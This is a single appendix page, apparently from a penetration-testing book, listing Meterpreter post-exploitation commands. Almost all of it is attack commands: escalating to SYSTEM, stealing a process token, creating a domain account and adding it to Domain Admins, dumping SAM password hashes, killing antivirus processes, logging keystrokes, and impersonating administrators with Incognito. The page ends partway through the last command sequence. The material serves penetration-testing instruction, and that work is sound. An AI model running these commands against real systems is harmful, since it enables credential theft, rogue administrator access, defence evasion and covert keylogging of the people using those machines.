background image

282

Appendix B

Meterpreter Post Exploitation Commands

Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > 

use priv

meterpreter > 

getsystem

Steal a domain administrator token from a given process ID, add a 

domain account, and then add it to the 

Domain Admins

 group:

meterpreter > 

ps

meterpreter > 

steal_token 1784

meterpreter > 

shell

C:\Windows\system32>

net user metasploit p@55w0rd /ADD /DOMAIN

C:\Windows\system32>

net group "Domain Admins" metasploit /ADD /DOMAIN

Dump password hashes from the SAM database:

meterpreter > 

use priv

meterpreter > 

getsystem

meterpreter > 

hashdump

NOTE

On Win2k8 you may need to migrate to a process that is running as SYSTEM if 

getsystem

 and 

hashdump

 throw exceptions.

Automigrate to a separate process:

meterpreter > 

run migrate

Kill antivirus processes running on the target via the 

killav

 Meterpreter 

script:

meterpreter > 

run killav

Capture keystrokes on target machines from within a particular process:

meterpreter > 

ps

meterpreter > 

migrate 1436

meterpreter > 

keyscan_start

meterpreter > 

keyscan_dump

meterpreter > 

keyscan_stop

Use Incognito to impersonate an administrator:

meterpreter > 

use incognito

meterpreter > 

list_tokens -u

meterpreter > 

use priv

meterpreter > 

getsystem